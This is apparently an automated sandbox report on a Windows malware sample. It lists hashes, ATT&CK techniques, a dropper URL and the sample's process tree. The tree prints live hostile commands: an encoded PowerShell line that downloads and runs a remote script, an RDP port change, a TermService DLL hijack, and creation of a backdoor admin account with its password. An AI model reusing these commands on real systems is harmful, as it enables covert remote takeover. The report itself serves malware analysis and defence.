80271a13696df77f092c3b6abce154f98e83f5840c64b610af7ae83cfe711482

Analysis

max time kernel
57s
max time network
56s
platform
windows10_x64
resource
win10v20210408
submitted
26-05-2021 18:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b1c13501a44f3017537f296fc3cd4919.exe
Size

6.0MB
MD5

b1c13501a44f3017537f296fc3cd4919
SHA1

10b0f90e3d298a6b1ca3dc8afec91683203a7161
SHA256

80271a13696df77f092c3b6abce154f98e83f5840c64b610af7ae83cfe711482
SHA512

abbce9675cd8921705e463c5eb702a6832736ba5a95705da79658ff4be2d39dfc1223a727d2bac23a67fbaae85a7e658e97e7332370caf17a6af700b4090c3ec

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000001ab4e-216.dat	upx
behavioral2/files/0x000500000001ab4f-217.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
2784	Process not Found
2784	Process not Found

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_31dwwnpb.nnj.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bsqkylpo.jaa.ps1	powershell.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3152	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3480	powershell.exe
3480	powershell.exe
3480	powershell.exe
1336	powershell.exe
1336	powershell.exe
1336	powershell.exe
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
3480	powershell.exe
3480	powershell.exe
3480	powershell.exe
1112	powershell.exe
1112	powershell.exe
1112	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
616	Process not Found
616	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe
Token: SeProfSingleProcessPrivilege	1336	powershell.exe
Token: SeIncBasePriorityPrivilege	1336	powershell.exe
Token: SeCreatePagefilePrivilege	1336	powershell.exe
Token: SeBackupPrivilege	1336	powershell.exe
Token: SeRestorePrivilege	1336	powershell.exe
Token: SeShutdownPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeSystemEnvironmentPrivilege	1336	powershell.exe
Token: SeRemoteShutdownPrivilege	1336	powershell.exe
Token: SeUndockPrivilege	1336	powershell.exe
Token: SeManageVolumePrivilege	1336	powershell.exe
Token: 33	1336	powershell.exe
Token: 34	1336	powershell.exe
Token: 35	1336	powershell.exe
Token: 36	1336	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeIncreaseQuotaPrivilege	3580	powershell.exe
Token: SeSecurityPrivilege	3580	powershell.exe
Token: SeTakeOwnershipPrivilege	3580	powershell.exe
Token: SeLoadDriverPrivilege	3580	powershell.exe
Token: SeSystemProfilePrivilege	3580	powershell.exe
Token: SeSystemtimePrivilege	3580	powershell.exe
Token: SeProfSingleProcessPrivilege	3580	powershell.exe
Token: SeIncBasePriorityPrivilege	3580	powershell.exe
Token: SeCreatePagefilePrivilege	3580	powershell.exe
Token: SeBackupPrivilege	3580	powershell.exe
Token: SeRestorePrivilege	3580	powershell.exe
Token: SeShutdownPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeSystemEnvironmentPrivilege	3580	powershell.exe
Token: SeRemoteShutdownPrivilege	3580	powershell.exe
Token: SeUndockPrivilege	3580	powershell.exe
Token: SeManageVolumePrivilege	3580	powershell.exe
Token: 33	3580	powershell.exe
Token: 34	3580	powershell.exe
Token: 35	3580	powershell.exe
Token: 36	3580	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeIncreaseQuotaPrivilege	2784	powershell.exe
Token: SeSecurityPrivilege	2784	powershell.exe
Token: SeTakeOwnershipPrivilege	2784	powershell.exe
Token: SeLoadDriverPrivilege	2784	powershell.exe
Token: SeSystemProfilePrivilege	2784	powershell.exe
Token: SeSystemtimePrivilege	2784	powershell.exe
Token: SeProfSingleProcessPrivilege	2784	powershell.exe
Token: SeIncBasePriorityPrivilege	2784	powershell.exe
Token: SeCreatePagefilePrivilege	2784	powershell.exe
Token: SeBackupPrivilege	2784	powershell.exe
Token: SeRestorePrivilege	2784	powershell.exe
Token: SeShutdownPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeSystemEnvironmentPrivilege	2784	powershell.exe
Token: SeRemoteShutdownPrivilege	2784	powershell.exe
Token: SeUndockPrivilege	2784	powershell.exe
Token: SeManageVolumePrivilege	2784	powershell.exe
Token: 33	2784	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 640 wrote to memory of 3480	640	b1c13501a44f3017537f296fc3cd4919.exe	75
PID 640 wrote to memory of 3480	640	b1c13501a44f3017537f296fc3cd4919.exe	75
PID 3480 wrote to memory of 1336	3480	powershell.exe	77
PID 3480 wrote to memory of 1336	3480	powershell.exe	77
PID 3480 wrote to memory of 3580	3480	powershell.exe	82
PID 3480 wrote to memory of 3580	3480	powershell.exe	82
PID 3480 wrote to memory of 2784	3480	powershell.exe	84
PID 3480 wrote to memory of 2784	3480	powershell.exe	84
PID 3480 wrote to memory of 1416	3480	powershell.exe	87
PID 3480 wrote to memory of 1416	3480	powershell.exe	87
PID 3480 wrote to memory of 3152	3480	powershell.exe	88
PID 3480 wrote to memory of 3152	3480	powershell.exe	88
PID 3480 wrote to memory of 3064	3480	powershell.exe	89
PID 3480 wrote to memory of 3064	3480	powershell.exe	89
PID 3480 wrote to memory of 3556	3480	powershell.exe	90
PID 3480 wrote to memory of 3556	3480	powershell.exe	90
PID 3556 wrote to memory of 3188	3556	net.exe	91
PID 3556 wrote to memory of 3188	3556	net.exe	91
PID 3480 wrote to memory of 2104	3480	powershell.exe	92
PID 3480 wrote to memory of 2104	3480	powershell.exe	92
PID 2104 wrote to memory of 3296	2104	cmd.exe	93
PID 2104 wrote to memory of 3296	2104	cmd.exe	93
PID 3296 wrote to memory of 2604	3296	cmd.exe	94
PID 3296 wrote to memory of 2604	3296	cmd.exe	94
PID 2604 wrote to memory of 2940	2604	net.exe	95
PID 2604 wrote to memory of 2940	2604	net.exe	95
PID 3480 wrote to memory of 2200	3480	powershell.exe	96
PID 3480 wrote to memory of 2200	3480	powershell.exe	96
PID 2200 wrote to memory of 1020	2200	cmd.exe	97
PID 2200 wrote to memory of 1020	2200	cmd.exe	97
PID 1020 wrote to memory of 1548	1020	cmd.exe	98
PID 1020 wrote to memory of 1548	1020	cmd.exe	98
PID 1548 wrote to memory of 2748	1548	net.exe	99
PID 1548 wrote to memory of 2748	1548	net.exe	99
PID 1888 wrote to memory of 3584	1888	cmd.exe	103
PID 1888 wrote to memory of 3584	1888	cmd.exe	103
PID 3584 wrote to memory of 1400	3584	net.exe	104
PID 3584 wrote to memory of 1400	3584	net.exe	104
PID 1112 wrote to memory of 3064	1112	cmd.exe	107
PID 1112 wrote to memory of 3064	1112	cmd.exe	107
PID 3064 wrote to memory of 3968	3064	net.exe	108
PID 3064 wrote to memory of 3968	3064	net.exe	108
PID 1156 wrote to memory of 2604	1156	cmd.exe	111
PID 1156 wrote to memory of 2604	1156	cmd.exe	111
PID 2604 wrote to memory of 3888	2604	net.exe	112
PID 2604 wrote to memory of 3888	2604	net.exe	112
PID 2904 wrote to memory of 884	2904	cmd.exe	115
PID 2904 wrote to memory of 884	2904	cmd.exe	115
PID 884 wrote to memory of 2272	884	net.exe	116
PID 884 wrote to memory of 2272	884	net.exe	116
PID 1328 wrote to memory of 3240	1328	cmd.exe	119
PID 1328 wrote to memory of 3240	1328	cmd.exe	119
PID 3240 wrote to memory of 3864	3240	net.exe	120
PID 3240 wrote to memory of 3864	3240	net.exe	120
PID 1112 wrote to memory of 2104	1112	cmd.exe	123
PID 1112 wrote to memory of 2104	1112	cmd.exe	123
PID 2104 wrote to memory of 2284	2104	net.exe	124
PID 2104 wrote to memory of 2284	2104	net.exe	124
PID 2188 wrote to memory of 3188	2188	cmd.exe	127
PID 2188 wrote to memory of 3188	2188	cmd.exe	127
PID 1864 wrote to memory of 4080	1864	cmd.exe	130
PID 1864 wrote to memory of 4080	1864	cmd.exe	130
PID 3296 wrote to memory of 2684	3296	cmd.exe	133
PID 3296 wrote to memory of 2684	3296	cmd.exe	133

C:\Users\Admin\AppData\Local\Temp\b1c13501a44f3017537f296fc3cd4919.exe
"C:\Users\Admin\AppData\Local\Temp\b1c13501a44f3017537f296fc3cd4919.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1416
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:3152
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3064
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3296
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2604
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1020
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1548
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2748
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1864
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4036

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:1400

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 4ni4GPhZ /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 4ni4GPhZ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 4ni4GPhZ /add
    3⤵
    PID:3968

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:3888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:2272

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3864

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 4ni4GPhZ
1⤵
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 4ni4GPhZ
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 4ni4GPhZ
    3⤵
    PID:2284

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:3188

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:1864
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:4080

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Suspicious use of WriteProcessMemory
PID:3296
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:1112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/640-116-0x000002866D3D0000-0x000002866D3D2000-memory.dmp

Filesize
8KB

Download
memory/640-117-0x000002866D3D3000-0x000002866D3D5000-memory.dmp

Filesize
8KB

Download
memory/640-119-0x000002866D3D6000-0x000002866D3D7000-memory.dmp

Filesize
4KB

Download
memory/640-118-0x000002866D3D5000-0x000002866D3D6000-memory.dmp

Filesize
4KB

Download
memory/640-114-0x000002866D810000-0x000002866DC31000-memory.dmp

Filesize
4.1MB

Download
memory/1112-236-0x00000155F2F06000-0x00000155F2F08000-memory.dmp

Filesize
8KB

Download
memory/1112-234-0x00000155F2F00000-0x00000155F2F02000-memory.dmp

Filesize
8KB

Download
memory/1112-235-0x00000155F2F03000-0x00000155F2F05000-memory.dmp

Filesize
8KB

Download
memory/1336-167-0x0000022843C93000-0x0000022843C95000-memory.dmp

Filesize
8KB

Download
memory/1336-165-0x0000022843C90000-0x0000022843C92000-memory.dmp

Filesize
8KB

Download
memory/1336-170-0x0000022843C96000-0x0000022843C98000-memory.dmp

Filesize
8KB

Download
memory/1336-194-0x0000022843C98000-0x0000022843C9A000-memory.dmp

Filesize
8KB

Download
memory/2784-201-0x0000022D60856000-0x0000022D60858000-memory.dmp

Filesize
8KB

Download
memory/2784-202-0x0000022D60858000-0x0000022D6085A000-memory.dmp

Filesize
8KB

Download
memory/2784-200-0x0000022D60853000-0x0000022D60855000-memory.dmp

Filesize
8KB

Download
memory/2784-199-0x0000022D60850000-0x0000022D60852000-memory.dmp

Filesize
8KB

Download
memory/3480-129-0x0000026C430D0000-0x0000026C430D1000-memory.dmp

Filesize
4KB

Download
memory/3480-125-0x0000026C42FD0000-0x0000026C42FD1000-memory.dmp

Filesize
4KB

Download
memory/3480-143-0x0000026C430C8000-0x0000026C430C9000-memory.dmp

Filesize
4KB

Download
memory/3480-131-0x0000026C430C0000-0x0000026C430C2000-memory.dmp

Filesize
8KB

Download
memory/3480-132-0x0000026C430C3000-0x0000026C430C5000-memory.dmp

Filesize
8KB

Download
memory/3480-142-0x0000026C430C6000-0x0000026C430C8000-memory.dmp

Filesize
8KB

Download
memory/3480-149-0x0000026C444F0000-0x0000026C444F1000-memory.dmp

Filesize
4KB

Download
memory/3480-148-0x0000026C44160000-0x0000026C44161000-memory.dmp

Filesize
4KB

Download
memory/3580-198-0x000001EAF8BF6000-0x000001EAF8BF8000-memory.dmp

Filesize
8KB

Download
memory/3580-195-0x000001EAF8BF0000-0x000001EAF8BF2000-memory.dmp

Filesize
8KB

Download
memory/3580-196-0x000001EAF8BF3000-0x000001EAF8BF5000-memory.dmp

Filesize
8KB

Download